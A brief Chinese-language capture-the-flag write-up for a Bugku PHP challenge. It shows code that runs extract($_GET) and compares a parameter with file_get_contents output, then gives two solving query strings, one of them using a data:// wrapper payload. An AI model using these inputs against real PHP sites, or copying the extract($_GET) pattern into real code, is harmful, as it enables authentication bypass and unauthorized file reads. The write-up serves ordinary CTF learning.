<?php
extract($_GET);
if (!empty($ac))
{
$f = trim(file_get_contents($fn));
if ($ac === $f)
{
echo "<p>This is flag:" ." $flag</p>";
}
else
{
echo "<p>sorry!</p>";
}
}
?>
题目需要传入ac与fn内容一致,有2个解题方法在bugku里
解法一:
?ac=bugku&fn=flag.txt
解法太迷了,但是在bugku里面就是能够实现,而且题目也提示了txt
字样
解法二:
ac=abc&fn=data://text/plain,abc
我认为这才是标准解法,使用data伪协议来做题,来实现内容一致